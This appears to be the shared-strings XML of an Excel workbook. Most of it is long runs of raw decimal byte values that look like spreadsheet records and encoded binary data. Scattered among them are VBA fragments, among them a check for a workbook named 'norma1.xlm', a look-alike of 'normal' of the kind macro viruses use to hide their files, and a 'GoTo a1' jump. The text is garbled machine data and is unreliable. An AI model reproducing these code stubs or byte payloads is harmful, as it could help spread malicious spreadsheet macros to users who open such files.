    <t xml:space="preserve">109 212 208 15 48 12 82 225 104 231 162 128 3 139 67 162 31 236 61 8 179 50 28 9 80 8 14 57 187 155 189 63 64 16 131 164 136 108 36 15 254 72 67 10 173 12 55 58 72 100 121 67 19 229 152 94 226 216 4 254 17 131 120 150 117 108 83 16 0 186 215 26 13 90 18 9 16 10 240 152 204 68 244 217 55 136 6 49 242 243 220 139 200 125 171 133 99 40 43 200 146 17 16 141 72 20 81 111 7 6 62 138 57 76 177 23 255 13 47 175 109 53 222 59 5 34 53 10 20 150 58 51 64 163 211 137 13 76 142 88 172 59 205 130 243 137 53 123 42 102 4 239 74 1 47 104 87 141 60 130 97 218 216 98 208 97 23 118 240 23 194 75 221 209 106 73 52 125 14 131 144 211 238 131 237 2 56 46 196 255 250 235 16 38 166 175 3 119 161 64 211 232 14 38 161 105 183 11 191 241 139 216 59 223 127 8 115 25 139 75 225 59 35 43 35 254 107 220 162 197 11 207 69 26 20 59 154 24 9 249 126 183 114 231 7 117 121 139 218 59 216 38 21 13 238 110 155 5 235 230 25 117 89 36 115 17 131 17 121 118 174 0 106 19 55 235 237 38 67 115 246 14 13 27 47 238 14 8 251 131 205 109 42 125 123 133 219 116 20 43 43 46 89 91 116 219 160 65 183 105 67 168 56 255 109 221 251 9 158 42 120 137 29 165 20 139 22 250 29 110 80 169 199 74 217 140 144 182 219 217 195 46 128 144 68 136 55 139 18 112 17 85 23 92 64 43 221 186 14 68 11 1 152 224 219 214 139 11 117 23 139 145 19 244 191 85 174 24 28 160 139 254 35 57 11 215 116 233 139 97 205 42 212 151 202 72 92 88 176 6 221 198 77 118 76 87 206 15 102 110 171 127 119 106 32 100 95 133 201 124 5 209 225 71 68 139 32 241 174 174 219 84 249 67 10 43 127 241 123 193 254 4 78 204 141 155 46 94 63 126 248 94 59 247 155 13 1 2 210 166 147 36 97 32 125 43 17 253 109 105 163 14 56 156 211 243 236 35 92 136 68 137 250 45 112 220 3 254 15 117 234 43 236 33 11 235 49 98 180 216 64 23 43 149 161 193 10 174 221 50 33 25 </t>
  </si>
  <si>
    <t xml:space="preserve">106 48 155 228 82 48 66 53 25 157 26 137 36 218 174 108 79 75 49 212 88 128 45 11 166 212 2 132 79 60 49 200 161 63 86 160 122 64 91 144 100 3 11 161 245 139 185 47 208 249 209 74 2 116 164 246 64 15 134 179 114 140 254 15 136 117 228 131 198 12 191 44 10 100 160 245 134 48 91 72 81 244 15 96 17 205 94 163 69 59 14 124 9 218 222 117 28 72 116 46 2 36 36 25 131 232 3 114 169 48 91 177 168 162 172 188 19 244 175 193 32 153 6 25 104 156 188 51 203 122 167 231 144 188 136 47 40 98 172 29 11 102 99 158 49 88 16 133 40 14 52 27 80 254 179 115 223 232 86 186 163 36 59 8 15 130 88 255 0 178 53 155 28 66 188 232 43 88 83 2 157 134 212 147 32 137 174 4 154 28 212 155 212 35 89 201 32 32 129 18 73 42 190 100 198 92 5 0 79 80 144 145 136 152 104 153 230 203 15 168 33 31 152 250 127 141 125 152 147 193 134 108 29 250 52 253 235 76 23 176 253 22 21 252 205 12 25 43 126 73 168 252 12 43 51 246 132 14 130 189 109 232 2 236 129 19 136 6 239 17 153 112 109 109 157 217 200 18 23 24 45 208 86 29 158 206 40 220 80 15 24 128 124 24 21 174 193 154 35 83 35 116 14 54 216 225 126 252 187 196 66 63 56 55 41 208 8 214 132 121 208 13 90 40 124 240 150 62 68 78 201 184 76 47 158 78 14 228 128 152 250 184 87 80 6 78 246 204 26 52 90 80 9 217 125 209 83 132 127 246 104 59 69 232 144 205 108 25 106 96 180 104 200 5 40 56 67 22 124 192 188 18 222 100 11 96 180 29 10 192 45 96 66 23 114 188 188 103 110 11 88 169 236 130 219 28 104 219 179 25 178 184 26 103 128 189 42 125 191 103 102 105 190 0 12 153 46 178 94 106 7 205 98 213 46 80 150 50 55 157 204 236 42 152 154 253 74 133 129 151 69 15 211 23 86 17 86 200 115 32 19 8 45 254 200 30 136 229 139 134 208 152 185 152 108 15 217 182 28 156 58 232 146 83 71 196 151 189 100 211 232 35 151 69 160 68 196 67 246 102 15 184 26 177 97 157 16 185 74 38 144 1 </t>
  </si>
  <si>
    <t xml:space="preserve">30 0 4 0 0 0 15 0 0 0 0 0 0 0 0 0 0 0 5 0 0 255 8 0 68 0 0 0 0 65 133 0 253 0 10 0 4 0 1 0 22 0 29 0 0 0 6 0 40 0 5 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 6 0 0 255 18 0 23 11 0 99 58 92 67 48 77 83 46 115 121 115 66 1 72 129 253 0 10 0 5 0 1 0 22 0 3 0 0 0 6 0 37 0 6 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 7 0 0 255 15 0 23 6 0 97 100 100 115 117 109 29 0 66 2 17 128 253 0 10 0 6 0 1 0 22 0 42 0 0 0 6 0 26 0 7 0 0 0 15 0 1 0 1 0 0 0 255 255 0 0 192 1 52 253 4 0 66 0 55 0 253 0 10 0 7 0 1 0 22 0 33 0 0 0 253 0 10 0 8 0 1 0 22 0 34 0 0 0 253 0 10 0 9 0 1 0 23 0 30 0 0 0 253 0 10 0 10 0 1 0 23 0 4 0 0 0 253 0 10 0 11 0 1 0 23 0 5 0 0 0 253 0 10 0 12 0 1 0 22 0 6 0 0 0 253 0 10 0 13 0 1 0 23 0 35 0 0 0 253 0 10 0 14 0 1 0 23 0 30 0 0 0 253 0 10 0 15 0 1 0 23 0 31 0 0 0 253 0 10 0 16 0 1 0 23 0 4 0 0 0 253 0 10 0 17 0 1 0 23 0 7 0 0 0 253 0 10 0 18 0 1 0 23 0 8 0 0 0 253 0 10 0 19 0 1 0 23 0 30 0 0 0 253 0 10 0 20 0 1 0 22 0 31 0 0 0 253 0 10 0 21 0 1 0 23 0 36 0 0 0 253 0 10 0 22 0 1 0 23 0 9 0 0 0 253 0 10 0 23 0 1 0 22 0 10 0 0 0 253 0 10 0 24 0 1 0 23 0 11 0 0 0 253 0 10 0 25 0 1 0 23 0 43 0 0 0 253 0 10 0 26 0 1 0 23 0 12 0 0 0 253 0 10 0 27 0 1 0 23 0 13 0 0 0 253 0 10 0 28 0 1 0 23 0 14 0 0 0 253 0 10 0 29 0 1 0 23 0 51 0 0 0 253 </t>
  </si>
  <si>
    <t xml:space="preserve">41 54 152 44 178 201 57 10 133 34 10 192 122 4 155 107 211 235 248 0 149 175 122 8 144 132 148 181 173 193 115 52 169 249 66 12 165 150 101 0 169 34 194 100 6 254 26 45 149 110 11 125 41 196 153 11 21 236 210 216 230 17 98 191 176 206 140 9 59 10 15 216 109 151 143 9 124 174 235 47 40 13 141 78 46 246 125 72 182 9 123 4 177 188 173 22 13 132 235 145 190 238 9 55 106 4 137 219 187 220 210 10 137 3 252 178 121 117 240 3 209 34 1 223 110 27 126 18 50 252 159 139 14 33 141 121 15 62 117 26 59 145 186 66 143 29 242 81 75 59 164 35 23 12 26 6 107 17 183 7 39 69 122 141 66 4 8 2 13 111 82 37 90 128 14 255 230 122 44 57 138 133 77 80 79 144 124 90 53 135 212 87 151 116 59 81 22 131 25 20 136 156 192 61 102 106 248 11 10 104 196 65 224 8 69 48 113 100 91 104 221 129 51 32 137 70 251 224 171 111 65 42 106 4 104 33 104 178 87 25 41 40 212 100 112 153 225 169 17 3 169 87 252 202 124 45 246 91 107 78 36 197 137 126 4 255 5 98 65 94 224 8 83 204 79 16 64 27 31 185 233 110 113 200 65 141 102 71 171 145 197 79 224 67 195 55 128 199 214 199 105 192 129 90 251 48 130 13 93 108 187 224 64 8 2 4 191 74 30 251 249 108 183 110 133 193 231 223 121 12 139 16 128 0 17 200 16 12 164 94 210 246 93 253 44 36 141 151 0 112 69 250 119 60 141 71 119 72 242 219 202 209 224 131 136 126 244 93 252 6 181 155 193 188 199 64 252 240 66 14 239 255 165 210 251 220 75 253 199 128 232 16 20 5 86 44 226 46 184 193 240 150 118 199 69 79 12 5 222 186 18 153 214 141 38 137 172 141 74 12 135 219 203 214 8 143 65 100 158 68 66 188 158 227 252 119 221 248 138 70 67 138 200 11 132 192 122 136 78 67 117 3 9 120 4 186 128 131 2 99 44 203 104 126 245 169 8 173 106 216 171 132 51 210 185 161 194 8 123 184 82 153 8 116 32 122 123 235 188 66 61 120 117 167 19 114 29 4 36 119 24 238 237 84 12 50 38 52 4 213 20 42 </t>
  </si>
  <si>
    <t xml:space="preserve">188 188 125 40 57 0 192 192 235 125 86 202 46 172 224 88 98 204 126 40 57 0 185 204 240 208 215 208 108 240 68 213 141 93 86 124 12 195 177 10 207 113 255 121 10 6 228 194 48 47 245 88 76 68 50 149 241 98 245 240 50 36 59 204 161 243 53 171 137 21 200 85 50 240 240 206 70 2 227 116 27 239 164 146 185 74 6 16 136 240 240 9 19 38 2 86 137 136 144 3 153 164 129 207 194 25 146 65 142 169 155 145 165 0 236 4 219 6 16 54 57 145 173 73 13 194 5 150 70 91 206 122 144 18 133 42 201 208 132 15 130 145 151 92 216 28 2 127 206 224 5 25 141 93 221 217 194 224 37 131 131 17 159 172 85 145 229 12 216 210 31 145 7 210 193 161 216 49 1 114 180 212 147 216 117 20 73 16 128 118 242 44 109 64 60 115 167 216 216 87 36 72 206 120 10 167 75 201 216 108 153 50 222 96 132 255 83 26 107 35 59 224 87 143 59 106 37 146 101 31 236 19 178 61 0 117 15 255 3 87 152 1 6 17 176 242 172 217 86 4 12 59 108 255 147 0 144 1 185 85 73 39 44 178 111 35 247 70 145 186 216 193 5 50 32 216 252 66 43 204 36 90 72 145 188 165 139 242 163 49 172 252 127 8 88 2 222 146 173 20 206 172 145 145 177 7 83 176 5 180 184 205 134 153 145 188 192 202 49 194 131 7 179 206 104 200 206 121 238 152 60 148 26 65 230 93 163 37 28 105 108 7 63 80 232 132 112 182 51 64 122 20 62 138 231 78 173 36 203 128 75 66 212 65 130 96 130 145 172 200 188 86 53 192 208 1 229 195 84 176 59 236 96 105 6 87 39 206 79 235 94 132 12 200 133 168 79 67 128 89 0 57 172 252 22 12 199 89 159 93 61 37 150 49 6 22 102 163 57 183 103 12 106 30 53 50 129 76 96 202 240 2 220 1 37 23 240 102 101 73 77 96 56 79 78 198 26 81 144 170 15 81 83 85 86 232 108 33 137 102 6 116 7 40 86 119 155 205 109 120 161 48 10 131 100 36 204 52 191 223 134 35 45 116 215 61 112 5 53 108 187 109 80 55 0 214 116 45 141 224 81 177 85 187 66 53 214 33 129 113 3 61 </t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).Name = "norma1.xlm" Then</t>
  </si>
  <si>
    <t xml:space="preserve">0 10 0 30 0 1 0 23 0 52 0 0 0 253 0 10 0 31 0 1 0 23 0 15 0 0 0 215 0 68 0 123 5 0 0 108 2 61 0 65 0 53 0 43 0 48 0 58 0 55 0 44 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 8 2 16 0 32 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 33 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 34 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 35 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 36 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 37 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 38 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 39 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 40 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 41 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 42 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 43 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 44 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 45 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 46 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 47 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 48 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 49 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 50 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 51 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 52 0 1 0 2 0 59 1 0 </t>
  </si>
  <si>
    <t xml:space="preserve">179 109 170 191 163 16 195 129 249 35 114 18 7 202 146 65 155 51 37 8 118 10 100 117 109 17 167 201 107 51 221 185 3 220 209 71 102 1 37 55 141 144 89 5 37 160 196 194 61 129 8 222 112 51 162 118 235 241 147 43 1 193 248 123 215 72 212 89 104 84 17 71 131 198 32 94 1 190 63 64 97 197 235 67 190 53 86 169 167 42 77 14 51 72 72 8 208 181 102 84 167 86 20 176 47 180 184 12 17 3 214 211 171 5 139 223 145 47 122 17 235 30 86 182 39 176 232 87 115 82 29 131 60 49 131 54 131 95 20 140 123 224 117 30 12 131 70 191 84 163 16 72 116 8 72 99 114 194 242 182 64 184 8 4 245 235 3 246 245 162 141 55 192 120 128 7 137 28 48 111 91 39 207 22 66 252 118 76 13 85 118 200 37 5 137 60 7 253 72 109 96 132 18 55 106 116 50 106 44 91 131 118 31 85 172 121 73 73 248 37 207 179 80 80 80 131 12 48 255 88 65 10 43 148 103 5 238 2 13 28 229 224 31 239 137 150 218 97 101 193 111 104 193 103 81 12 176 66 173 62 0 127 107 159 117 87 15 175 5 95 254 224 139 222 119 13 173 93 97 32 78 220 21 119 42 35 42 117 62 0 117 13 83 74 24 149 46 180 15 63 43 86 196 170 1 104 93 27 21 20 34 214 226 6 231 195 130 74 25 203 47 146 125 48 91 208 196 185 196 87 61 60 169 70 23 163 28 208 248 62 137 37 103 20 91 96 94 139 68 163 216 160 194 47 40 96 13 103 236 173 21 230 76 116 136 20 124 23 35 165 98 47 120 255 52 176 225 12 233 232 27 140 226 36 176 0 130 188 92 195 204 160 72 49 219 185 140 240 55 83 51 156 85 86 82 131 73 12 8 199 65 238 2 238 3 100 235 17 12 170 65 20 24 199 93 134 112 18 174 38 131 97 4 104 4 83 7 4 85 114 3 49 88 183 192 102 134 138 16 64 20 240 236 240 237 0 58 175 15 172 255 208 237 4 56 58 164 76 38 99 28 27 223 162 212 86 147 86 49 50 199 69 228 12 254 59 248 169 0 69 232 116 9 85 198 69 255 16 235 11 128 101 255 69 175 102 139 72 236 184 100 35 </t>
  </si>
  <si>
    <t xml:space="preserve">1 175 221 18 117 23 83 71 60 112 10 236 241 179 18 108 13 213 161 52 227 105 53 228 155 144 129 52 52 147 213 128 217 12 53 129 11 44 81 165 218 7 106 131 55 10 146 170 187 111 67 93 91 117 5 16 36 179 89 209 145 42 75 80 6 12 43 60 253 151 168 87 198 254 247 247 51 201 137 141 212 2 141 243 60 207 23 140 141 141 141 141 82 108 81 133 63 82 60 82 39 85 174 196 129 170 60 201 141 128 34 156 162 135 123 232 106 55 23 108 26 35 133 179 88 137 7 101 162 26 173 139 35 3 13 14 37 194 85 235 34 207 102 160 125 70 48 176 160 8 93 45 90 70 28 34 85 216 166 97 196 43 201 191 107 253 36 232 17 194 179 2 89 119 13 197 164 138 4 38 247 3 61 32 33 6 83 173 128 134 72 70 86 12 209 16 0 205 7 113 44 163 119 50 74 136 142 232 73 68 12 240 9 113 16 96 21 89 137 6 232 180 146 49 106 212 228 97 32 19 66 46 1 112 5 57 32 23 211 199 69 37 44 200 121 93 139 152 28 210 187 228 229 70 162 222 44 38 198 38 34 182 192 26 195 155 0 240 38 135 108 9 13 86 177 248 160 15 102 0 136 52 47 79 247 236 100 43 58 33 3 119 33 19 43 217 140 234 54 224 199 3 207 245 96 78 136 2 94 56 44 152 182 70 195 228 120 223 195 116 130 12 44 47 188 7 139 6 56 85 200 200 200 230 241 5 56 60 64 89 182 207 200 68 72 93 100 2 104 96 39 68 179 98 92 172 67 87 179 221 158 17 239 116 25 221 100 80 3 92 79 49 131 88 96 21 83 8 124 101 133 239 201 137 30 29 184 136 80 178 62 189 100 178 160 252 24 81 81 109 52 138 0 56 115 151 22 106 3 173 200 229 117 171 70 113 83 189 235 179 66 4 139 16 110 82 124 59 199 214 110 182 224 219 3 17 32 106 101 80 220 181 252 5 22 190 139 111 184 105 133 55 15 135 143 52 15 182 128 91 87 176 52 212 155 125 36 133 187 86 229 252 248 201 3 251 142 130 50 71 84 57 18 48 88 87 114 202 78 14 56 37 16 135 226 201 41 57 37 26 253 13 114 78 217 43 91 113 65 182 18 7 </t>
  </si>
  <si>
    <t xml:space="preserve">GoTo a1</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 1 15 0 8 2 16 0 53 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 54 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 55 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 56 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 57 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 58 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 59 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 60 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 61 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 62 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 63 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 253 0 10 0 32 0 1 0 23 0 16 0 0 0 253 0 10 0 33 0 1 0 22 0 17 0 0 0 253 0 10 0 34 0 1 0 23 0 31 0 0 0 253 0 10 0 35 0 1 0 22 0 18 0 0 0 253 0 10 0 36 0 1 0 22 0 30 0 0 0 253 0 10 0 37 0 1 0 22 0 37 0 0 0 253 0 10 0 38 0 1 0 22 0 19 0 0 0 253 0 10 0 39 0 1 0 22 0 48 0 0 0 253 0 10 0 40 0 1 0 22 0 20 0 0 0 253 0 10 0 41 0 1 0 23 0 44 0 0 0 253 0 10 0 42 0 1 0 23 0 12 0 0 0 253 0 10 0 43 0 1 0 23 0 13 0 0 0 253 0 10 0 44 0 1 0 22 0 14 0 0 0 253 0 10 0 45 0 1 0 22 0 51 0 0 0 253 0 10 0 46 0 1 0 22 0 52 0 0 0 253 0 10 0 47 0 1 0 22 0 15 0 0 0 253 0 10 0 48 0 1 0 22 0 16 0 0 0 253 0 10 0 49 0 1 0 23 0 17 0 0 0 253 0 10 0 50 0 1 0 22 0 31 0 0 0 253 0 10 0 51 0 1 0 23 0 18 0 0 0 253 0 10 0 52 </t>
  </si>
  <si>
    <t xml:space="preserve">218 183 190 35 17 246 197 64 98 57 5 8 120 90 165 198 191 81 120 77 255 128 37 79 94 35 198 43 195 116 45 160 105 78 0 218 33 2 95 22 29 179 5 183 61 50 67 70 244 16 86 16 8 42 52 224 228 64 235 7 128 153 66 91 121 121 219 5 38 4 32 116 24 48 116 10 97 187 191 66 237 22 143 240 235 73 238 247 235 12 182 54 234 116 8 1 119 240 83 7 130 71 122 249 142 4 35 202 191 205 200 127 53 16 77 21 88 140 203 156 40 29 53 65 183 43 206 51 116 60 7 3 0 110 167 27 217 92 244 71 248 55 8 4 215 116 141 182 46 94 248 121 42 5 26 7 116 187 91 77 6 9 238 116 14 172 48 9 38 5 235 32 94 238 163 247 102 190 254 110 131 13 154 255 55 19 38 152 211 20 195 176 197 247 209 2 20 55 140 244 6 247 2 161 10 129 206 31 15 246 1 246 196 197 54 136 27 171 11 247 184 8 20 29 17 219 110 96 10 168 17 6 11 251 44 70 105 131 174 144 101 207 162 223 80 244 106 108 124 19 24 113 62 138 86 167 170 81 219 5 242 228 80 6 240 161 226 11 60 158 246 124 192 141 247 116 18 86 171 76 119 16 99 117 27 10 20 20 15 141 89 21 12 96 108 97 196 130 225 16 119 155 101 9 224 39 120 48 119 166 8 189 45 37 89 172 11 108 13 32 38 243 147 12 1 121 245 194 192 250 136 69 11 124 242 11 72 136 111 55 138 91 158 117 120 213 116 246 248 2 116 110 58 134 108 5 166 255 239 137 122 16 11 21 141 174 129 98 128 237 246 46 127 116 77 235 63 54 19 0 180 19 197 73 42 54 168 83 165 117 22 197 175 131 184 24 19 26 220 240 21 60 228 3 51 196 88 169 18 158 79 23 125 64 141 117 133 198 89 50 150 154 227 69 25 76 102 121 15 11 60 136 124 171 218 76 48 4 32 60 130 161 152 21 229 152 87 241 167 135 248 106 141 164 36 150 255 66 87 247 193 3 240 108 227 15 210 138 1 65 132 244 59 14 117 241 184 112 161 47 248 186 255 254 254 140 208 131 79 51 194 221 210 55 26 218 169 52 1 129 116 232 77 252 38 35 185 205 196 198 132 228 </t>
  </si>
  <si>
    <t xml:space="preserve">199 37 167 236 74 83 37 23 76 78 201 41 57 25 103 22 34 20 57 146 83 114 74 8 208 45 202 174 228 148 156 64 229 44 227 86 37 167 236 202 75 26 208 12 39 78 201 41 57 66 172 47 216 17 77 216 87 114 74 9 1 9 235 126 15 32 63 144 31 16 18 235 110 15 181 235 94 129 252 64 126 10 119 235 78 6 84 235 62 7 242 3 249 5 175 235 46 4 132 235 30 40 142 29 15 228 146 235 14 32 206 229 235 10 202 90 97 148 29 212 162 15 204 142 81 104 9 81 169 51 210 48 181 113 2 188 48 179 35 89 232 241 109 85 203 206 227 117 39 91 87 38 1 96 183 246 251 244 250 87 119 45 89 101 15 235 1 12 182 93 1 219 95 84 94 66 137 85 73 118 52 205 178 235 3 99 7 241 84 175 222 156 44 155 102 217 61 85 42 191 47 86 207 217 52 93 211 149 152 3 172 31 32 84 166 105 154 102 51 89 70 146 165 187 166 107 154 203 184 168 55 4 80 3 250 83 117 77 215 108 7 223 239 3 255 15 27 127 215 116 93 215 35 108 3 193 27 13 7 212 23 31 255 214 155 101 231 83 66 0 1 2 39 209 5 6 7 8 39 9 39 255 111 254 237 10 11 39 0 12 13 39 14 15 16 39 17 18 19 39 20 21 22 23 24 25 26 39 113 194 255 221 27 28 16 29 30 31 39 32 33 34 35 36 37 38 4 11 129 160 235 36 93 67 96 118 241 185 116 39 134 196 125 249 20 213 180 51 240 50 5 92 250 39 38 225 236 158 8 12 106 96 84 31 104 100 29 232 45 5 36 163 47 75 31 120 192 17 83 52 190 194 86 163 12 250 128 96 91 199 86 194 17 160 27 232 160 74 254 86 79 140 248 32 11 208 60 56 139 10 28 56 86 191 36 62 150 129 71 225 170 104 228 188 11 213 33 210 61 104 212 10 87 214 31 64 115 109 45 147 156 6 134 108 26 94 60 86 181 48 95 163 114 182 64 245 128 193 2 64 148 164 160 237 197 126 1 80 199 6 16 47 200 136 119 111 147 226 42 131 189 124 21 2 15 148 192 130 77 128 153 213 53 23 51 104 209 108 13 96 8 112 5 138 88 34 89 11 180 62 246 40 </t>
  </si>
  <si>
    <t xml:space="preserve">0 1 0 23 0 30 0 0 0 253 0 10 0 53 0 1 0 23 0 38 0 0 0 253 0 10 0 54 0 1 0 23 0 21 0 0 0 253 0 10 0 55 0 1 0 23 0 49 0 0 0 253 0 10 0 56 0 1 0 23 0 47 0 0 0 253 0 10 0 57 0 1 0 23 0 45 0 0 0 253 0 10 0 58 0 1 0 23 0 12 0 0 0 253 0 10 0 59 0 1 0 23 0 13 0 0 0 253 0 10 0 60 0 1 0 23 0 14 0 0 0 253 0 10 0 61 0 1 0 22 0 51 0 0 0 253 0 10 0 62 0 1 0 22 0 52 0 0 0 253 0 10 0 63 0 1 0 22 0 15 0 0 0 215 0 68 0 64 4 0 0 108 2 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 8 2 16 0 64 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 65 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 66 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 67 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 68 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 69 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 70 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 71 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 72 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 73 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 74 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 75 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 76 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 77 0 1 0 2 0 29 1 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 169 21 56 14 6 109 107 113 161 7 187 235 205 123 135 13 4 193 186 229 229 254 235 8 253 235 3 252 96 12 95 31 236 11 244 25 138 17 65 239 100 136 23 71 98 238 235 5 137 96 45 86 138 23 145 103 110 105 127 119 152 129 254 107 225 47 52 132 246 116 39 247 194 68 27 123 99 105 18 7 106 199 56 100 141 103 119 129 95 195 102 8 198 71 168 12 6 123 193 182 8 136 7 223 222 20 236 17 67 78 64 84 227 75 78 154 139 50 36 19 153 100 123 132 65 53 43 193 195 9 254 253 19 103 77 38 252 41 24 76 180 185 64 14 137 117 53 112 53 52 81 193 81 201 254 67 86 241 137 191 14 50 80 50 86 9 210 184 136 195 167 89 98 169 57 197 114 208 48 118 7 153 142 27 24 232 80 173 128 108 247 70 241 197 36 75 64 142 191 96 121 18 108 61 86 104 125 232 233 80 243 171 170 49 100 89 136 95 119 137 15 134 239 26 125 238 110 187 8 65 161 176 77 239 116 67 69 94 162 68 237 15 182 185 56 108 15 135 147 101 27 39 250 37 136 64 234 238 82 40 0 11 181 72 182 82 129 183 10 187 223 209 4 170 141 158 152 145 128 59 35 32 44 138 11 221 98 209 81 1 184 133 182 250 183 119 219 183 187 169 20 240 138 146 128 32 8 144 70 64 19 118 91 185 90 248 245 65 65 128 57 88 212 28 155 8 37 23 111 0 163 4 114 193 210 164 254 240 126 185 76 162 13 80 163 172 11 186 141 182 140 225 254 222 237 59 191 64 15 165 165 89 163 187 165 235 85 64 51 3 166 171 64 122 72 111 161 155 197 126 241 8 64 61 255 180 241 86 57 44 84 198 218 107 47 235 6 250 11 194 77 171 53 12 188 209 0 129 57 29 248 192 151 33 232 96 247 48 237 4 54 22 151 3 107 225 181 30 4 3 64 33 85 240 247 90 169 254 101 75 11 75 255 37 136 253 200 133 141 106 253 20 132 252 117 15 161 36 232 56 182 204 97 25 73 45 164 78 116 160 192 219 151 32 232 4 116 23 4 13 116 12 200 219 217 12 252 89 184 4 47 5 18 11 8 131 188 240 60 17 87 108 89 51 192 170 123 111 132 96 180 </t>
  </si>
  <si>
    <t xml:space="preserve">17 124 0 156 15 174 40 170 154 102 135 82 24 59 8 236 156 189 0 87 205 202 154 20 41 168 37 106 103 167 216 47 136 232 2 181 115 28 203 234 234 73 52 200 180 205 204 216 2 123 80 98 95 24 57 66 133 35 159 131 36 104 219 136 177 117 16 28 161 187 116 106 8 212 128 214 182 6 143 114 215 139 232 167 39 80 35 86 24 106 165 169 238 248 8 236 123 237 43 3 227 201 116 26 45 39 180 182 33 243 216 139 157 24 81 44 43 25 102 219 75 214 36 52 137 16 40 51 253 191 251 111 75 245 108 26 193 237 4 116 107 64 59 232 25 20 114 98 102 131 123 101 162 99 183 8 246 78 106 197 100 248 114 247 147 109 71 27 115 4 52 96 39 139 71 96 43 11 83 80 34 239 89 211 22 152 167 98 189 18 112 44 108 27 244 201 104 117 51 133 140 87 53 92 6 111 93 219 131 195 167 93 57 109 20 118 158 193 58 116 192 186 161 36 176 139 199 245 166 71 187 5 58 195 253 20 0 8 149 52 155 161 223 141 175 94 129 197 243 100 16 85 34 132 61 128 67 104 8 25 118 221 215 93 203 67 4 165 32 119 139 3 59 177 114 177 3 75 68 192 147 79 32 16 212 8 95 97 74 46 121 6 63 223 104 39 90 9 92 69 25 112 97 248 170 78 213 117 236 19 145 248 216 84 60 131 207 76 144 173 137 48 219 36 96 43 233 152 158 50 156 104 94 48 11 153 136 117 137 117 244 53 247 137 46 76 166 175 29 240 28 244 81 34 166 234 93 84 137 13 0 240 253 127 128 226 70 67 128 211 129 75 106 28 168 223 77 184 13 163 255 112 24 27 21 236 142 108 239 78 167 25 249 246 69 205 16 9 15 209 1 125 13 159 182 226 5 102 117 200 223 215 96 240 205 117 206 17 152 15 61 86 62 126 195 86 118 179 240 93 61 219 0 128 96 15 81 35 116 55 205 88 240 165 211 23 20 29 178 25 170 216 211 19 232 116 254 91 181 22 200 65 148 70 70 3 193 59 240 114 208 124 132 217 254 149 114 133 246 66 152 102 134 107 36 233 56 14 234 232 209 24 206 208 39 219 17 228 44 15 183 202 4 182 231 121 158 226 224 216 222 218 </t>
  </si>
  <si>
